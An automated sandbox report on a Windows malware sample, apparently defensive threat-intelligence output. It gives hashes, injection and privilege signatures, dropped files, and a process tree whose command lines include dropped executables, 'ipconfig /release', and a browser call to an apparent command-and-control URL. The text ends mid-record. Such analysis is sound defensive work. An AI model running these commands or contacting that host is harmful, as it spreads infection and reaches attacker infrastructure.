ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4

Analysis

max time kernel
186s
max time network
188s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
29/11/2022, 14:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
Size

361KB
MD5

49f5bef87fc96acfded2371efc06fec6
SHA1

2ba93a292f4fe3f0f2b3da3a7ba46e45b509b3bd
SHA256

ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4
SHA512

4d15f106d5e16652398448881c3582be8bf01cdffb99daa0818dc6cf70426f1fc844b7c81cc8454a95eb569a5862e8505e5c2d5f2ded6577dd3f0f11348d2ad8
SSDEEP

6144:pflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:pflfAsiVGjSGecvX

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

description	pid	Process	procid_target
PID 3864 created 3932	3864	svchost.exe	87
PID 3864 created 3844	3864	svchost.exe	90
PID 3864 created 3144	3864	svchost.exe	96
PID 3864 created 4592	3864	svchost.exe	102
PID 3864 created 1448	3864	svchost.exe	106
PID 3864 created 1292	3864	svchost.exe	109
PID 3864 created 3964	3864	svchost.exe	117
PID 3864 created 4208	3864	svchost.exe	119
PID 3864 created 3248	3864	svchost.exe	123

Executes dropped EXE 15 IoCs

pid	Process
3580	ztrljdbwtomgeywq.exe
3932	CreateProcess.exe
1880	nlfdxvpnif.exe
3844	CreateProcess.exe
3144	CreateProcess.exe
1668	i_nlfdxvpnif.exe
4592	CreateProcess.exe
4544	lfdxvqnifa.exe
1448	CreateProcess.exe
1292	CreateProcess.exe
4668	i_lfdxvqnifa.exe
3964	CreateProcess.exe
1364	mgeywqojgb.exe
4208	CreateProcess.exe
3248	CreateProcess.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
4928	ipconfig.exe
1760	ipconfig.exe
3988	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9011864d1e05d901	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376620485"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6851ef31fd3cf49b332bbb4721c974800000000020000000000106600000001000020000000ac6fee1fb46702c2207d69cfaa1b0a32e1d496d17271142f546e5ea7a6f7cff6000000000e8000000002000020000000ed46884ec1d379edf49720f7385b3b1bd180e58a93f23ae62cd0b1961c22a2fb20000000138de1d5e614f343708db3145cbf5990013436f82e9abc9eda3b3e231cfb978940000000f429a320a106f7d5d4a644bc6405c0d87dce69e8484483c49fe11d4087edf02d731cbf4a82f9ce6211fb0cc8b48f5965573956c585f935ad5ccc19b831abcf49	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "983448523"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "983448523"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6851ef31fd3cf49b332bbb4721c974800000000020000000000106600000001000020000000f3f95108bbe8f2b8dead317a410a578e2ab31f9d67bd242e69e72b98aa5e0432000000000e8000000002000020000000017dc0ed447957794fcdf0069723decbc0489d422d0428b46e9f334a5446ad4e20000000509c47ff13a15970a4d5d0c841c471f83a01fc963f39eab08d02f2e321c199fb4000000008278d59f78adcef01518b3a506afff04ca758910e05d116ef30b87e6b299bdc63f3effc07be09cf1a2f605eed26d32252bce52a70df43005d4e81dc88b1815b	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{519ADF62-7111-11ED-919F-DEE008EA10AF} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30999838"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999838"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 906dac521e05d901	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
3580	ztrljdbwtomgeywq.exe
3580	ztrljdbwtomgeywq.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
3580	ztrljdbwtomgeywq.exe
3580	ztrljdbwtomgeywq.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
3580	ztrljdbwtomgeywq.exe
3580	ztrljdbwtomgeywq.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
3580	ztrljdbwtomgeywq.exe
3580	ztrljdbwtomgeywq.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
648	Process not Found
648	Process not Found
648	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeTcbPrivilege	3864	svchost.exe
Token: SeTcbPrivilege	3864	svchost.exe
Token: SeDebugPrivilege	1668	i_nlfdxvpnif.exe
Token: SeDebugPrivilege	4668	i_lfdxvqnifa.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4304	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
4304	iexplore.exe
4304	iexplore.exe
2184	IEXPLORE.EXE
2184	IEXPLORE.EXE
2184	IEXPLORE.EXE
2184	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 632 wrote to memory of 3580	632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe	84
PID 632 wrote to memory of 3580	632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe	84
PID 632 wrote to memory of 3580	632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe	84
PID 632 wrote to memory of 4304	632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe	85
PID 632 wrote to memory of 4304	632	ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe	85
PID 4304 wrote to memory of 2184	4304	iexplore.exe	86
PID 4304 wrote to memory of 2184	4304	iexplore.exe	86
PID 4304 wrote to memory of 2184	4304	iexplore.exe	86
PID 3580 wrote to memory of 3932	3580	ztrljdbwtomgeywq.exe	87
PID 3580 wrote to memory of 3932	3580	ztrljdbwtomgeywq.exe	87
PID 3580 wrote to memory of 3932	3580	ztrljdbwtomgeywq.exe	87
PID 3864 wrote to memory of 1880	3864	svchost.exe	89
PID 3864 wrote to memory of 1880	3864	svchost.exe	89
PID 3864 wrote to memory of 1880	3864	svchost.exe	89
PID 1880 wrote to memory of 3844	1880	nlfdxvpnif.exe	90
PID 1880 wrote to memory of 3844	1880	nlfdxvpnif.exe	90
PID 1880 wrote to memory of 3844	1880	nlfdxvpnif.exe	90
PID 3864 wrote to memory of 3988	3864	svchost.exe	91
PID 3864 wrote to memory of 3988	3864	svchost.exe	91
PID 3580 wrote to memory of 3144	3580	ztrljdbwtomgeywq.exe	96
PID 3580 wrote to memory of 3144	3580	ztrljdbwtomgeywq.exe	96
PID 3580 wrote to memory of 3144	3580	ztrljdbwtomgeywq.exe	96
PID 3864 wrote to memory of 1668	3864	svchost.exe	98
PID 3864 wrote to memory of 1668	3864	svchost.exe	98
PID 3864 wrote to memory of 1668	3864	svchost.exe	98
PID 3580 wrote to memory of 4592	3580	ztrljdbwtomgeywq.exe	102
PID 3580 wrote to memory of 4592	3580	ztrljdbwtomgeywq.exe	102
PID 3580 wrote to memory of 4592	3580	ztrljdbwtomgeywq.exe	102
PID 3864 wrote to memory of 4544	3864	svchost.exe	103
PID 3864 wrote to memory of 4544	3864	svchost.exe	103
PID 3864 wrote to memory of 4544	3864	svchost.exe	103
PID 4544 wrote to memory of 1448	4544	lfdxvqnifa.exe	106
PID 4544 wrote to memory of 1448	4544	lfdxvqnifa.exe	106
PID 4544 wrote to memory of 1448	4544	lfdxvqnifa.exe	106
PID 3864 wrote to memory of 4928	3864	svchost.exe	107
PID 3864 wrote to memory of 4928	3864	svchost.exe	107
PID 3580 wrote to memory of 1292	3580	ztrljdbwtomgeywq.exe	109
PID 3580 wrote to memory of 1292	3580	ztrljdbwtomgeywq.exe	109
PID 3580 wrote to memory of 1292	3580	ztrljdbwtomgeywq.exe	109
PID 3864 wrote to memory of 4668	3864	svchost.exe	110
PID 3864 wrote to memory of 4668	3864	svchost.exe	110
PID 3864 wrote to memory of 4668	3864	svchost.exe	110
PID 3580 wrote to memory of 3964	3580	ztrljdbwtomgeywq.exe	117
PID 3580 wrote to memory of 3964	3580	ztrljdbwtomgeywq.exe	117
PID 3580 wrote to memory of 3964	3580	ztrljdbwtomgeywq.exe	117
PID 3864 wrote to memory of 1364	3864	svchost.exe	118
PID 3864 wrote to memory of 1364	3864	svchost.exe	118
PID 3864 wrote to memory of 1364	3864	svchost.exe	118
PID 1364 wrote to memory of 4208	1364	mgeywqojgb.exe	119
PID 1364 wrote to memory of 4208	1364	mgeywqojgb.exe	119
PID 1364 wrote to memory of 4208	1364	mgeywqojgb.exe	119
PID 3864 wrote to memory of 1760	3864	svchost.exe	120
PID 3864 wrote to memory of 1760	3864	svchost.exe	120
PID 3580 wrote to memory of 3248	3580	ztrljdbwtomgeywq.exe	123
PID 3580 wrote to memory of 3248	3580	ztrljdbwtomgeywq.exe	123
PID 3580 wrote to memory of 3248	3580	ztrljdbwtomgeywq.exe	123

C:\Users\Admin\AppData\Local\Temp\ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe
"C:\Users\Admin\AppData\Local\Temp\ee661dd8e13b6039457221c08dceb15576f9d6b4e99dc173b5ab32c7a1538cc4.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:632
- C:\Temp\ztrljdbwtomgeywq.exe
  C:\Temp\ztrljdbwtomgeywq.exe run
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3580
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\nlfdxvpnif.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:3932
  - - C:\Temp\nlfdxvpnif.exe
      C:\Temp\nlfdxvpnif.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1880
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:3844
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:3988
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_nlfdxvpnif.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:3144
  - - C:\Temp\i_nlfdxvpnif.exe
      C:\Temp\i_nlfdxvpnif.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1668
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\lfdxvqnifa.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:4592
  - - C:\Temp\lfdxvqnifa.exe
      C:\Temp\lfdxvqnifa.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4544
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1448
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4928
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_lfdxvqnifa.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1292
  - - C:\Temp\i_lfdxvqnifa.exe
      C:\Temp\i_lfdxvqnifa.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4668
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\mgeywqojgb.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:3964
  - - C:\Temp\mgeywqojgb.exe
      C:\Temp\mgeywqojgb.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1364
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:4208
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:1760
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_mgeywqojgb.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:3248
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4304 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3864

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
73cb073e13542fb21ae8f465fd20f03b

SHA1
8887204637744e2869f7442ff1fda7fa20145626

SHA256
d4194b96c1fdf8010a5511eeb0bc6972e32dfb2ccf6789d74a6608cf535ff39a

SHA512
023a1012f8ad0dcc79f007b791d32755c6820ccdbceb7c4f31c73094fb7c323484f83168eefe41accf3351b2fbe8876a1ea826c68edba12a994ca5b96e0c1b21

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
73cb073e13542fb21ae8f465fd20f03b

SHA1
8887204637744e2869f7442ff1fda7fa20145626

SHA256
d4194b96c1fdf8010a5511eeb0bc6972e32dfb2ccf6789d74a6608cf535ff39a

SHA512
023a1012f8ad0dcc79f007b791d32755c6820ccdbceb7c4f31c73094fb7c323484f83168eefe41accf3351b2fbe8876a1ea826c68edba12a994ca5b96e0c1b21

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
73cb073e13542fb21ae8f465fd20f03b

SHA1
8887204637744e2869f7442ff1fda7fa20145626

SHA256
d4194b96c1fdf8010a5511eeb0bc6972e32dfb2ccf6789d74a6608cf535ff39a

SHA512
023a1012f8ad0dcc79f007b791d32755c6820ccdbceb7c4f31c73094fb7c323484f83168eefe41accf3351b2fbe8876a1ea826c68edba12a994ca5b96e0c1b21

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
73cb073e13542fb21ae8f465fd20f03b

SHA1
8887204637744e2869f7442ff1fda7fa20145626

SHA256
d4194b96c1fdf8010a5511eeb0bc6972e32dfb2ccf6789d74a6608cf535ff39a

SHA512
023a1012f8ad0dcc79f007b791d32755c6820ccdbceb7c4f31c73094fb7c323484f83168eefe41accf3351b2fbe8876a1ea826c68edba12a994ca5b96e0c1b21

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
73cb073e13542fb21ae8f465fd20f03b

SHA1
8887204637744e2869f7442ff1fda7fa20145626

SHA256
d4194b96c1fdf8010a5511eeb0bc6972e32dfb2ccf6789d74a6608cf535ff39a

SHA512
023a1012f8ad0dcc79f007b791d32755c6820ccdbceb7c4f31c73094fb7c323484f83168eefe41accf3351b2fbe8876a1ea826c68edba12a994ca5b96e0c1b21

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
73cb073e13542fb21ae8f465fd20f03b

SHA1
8887204637744e2869f7442ff1fda7fa20145626

SHA256
d4194b96c1fdf8010a5511eeb0bc6972e32dfb2ccf6789d74a6608cf535ff39a

SHA512
023a1012f8ad0dcc79f007b791d32755c6820ccdbceb7c4f31c73094fb7c323484f83168eefe41accf3351b2fbe8876a1ea826c68edba12a994ca5b96e0c1b21

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
73cb073e13542fb21ae8f465fd20f03b

SHA1
8887204637744e2869f7442ff1fda7fa20145626

SHA256
d4194b96c1fdf8010a5511eeb0bc6972e32dfb2ccf6789d74a6608cf535ff39a

SHA512
023a1012f8ad0dcc79f007b791d32755c6820ccdbceb7c4f31c73094fb7c323484f83168eefe41accf3351b2fbe8876a1ea826c68edba12a994ca5b96e0c1b21

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
73cb073e13542fb21ae8f465fd20f03b

SHA1
8887204637744e2869f7442ff1fda7fa20145626

SHA256
d4194b96c1fdf8010a5511eeb0bc6972e32dfb2ccf6789d74a6608cf535ff39a

SHA512
023a1012f8ad0dcc79f007b791d32755c6820ccdbceb7c4f31c73094fb7c323484f83168eefe41accf3351b2fbe8876a1ea826c68edba12a994ca5b96e0c1b21

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
73cb073e13542fb21ae8f465fd20f03b

SHA1
8887204637744e2869f7442ff1fda7fa20145626

SHA256
d4194b96c1fdf8010a5511eeb0bc6972e32dfb2ccf6789d74a6608cf535ff39a

SHA512
023a1012f8ad0dcc79f007b791d32755c6820ccdbceb7c4f31c73094fb7c323484f83168eefe41accf3351b2fbe8876a1ea826c68edba12a994ca5b96e0c1b21

Download Submit
C:\Temp\i_lfdxvqnifa.exe

Filesize
361KB

MD5
5be8e9c63082d8e863492cccd13b3d24

SHA1
1b215f56b95464efaa1ee6e0b6d22a290d949954

SHA256
2577ef43b16ffb6f3a56cef0360300eb621b2a623170461ae256efe3648c558e

SHA512
8daa98d5b56f29837db937261ac3f4a76ca8cddfa9f7ed0d70e8ef0c38f994d0d8f3e5a4952c39bf7f604d9da1e736a1d874f94a7102f3254291acbe955bd089

Download Submit
C:\Temp\i_lfdxvqnifa.exe

Filesize
361KB

MD5
5be8e9c63082d8e863492cccd13b3d24

SHA1
1b215f56b95464efaa1ee6e0b6d22a290d949954

SHA256
2577ef43b16ffb6f3a56cef0360300eb621b2a623170461ae256efe3648c558e

SHA512
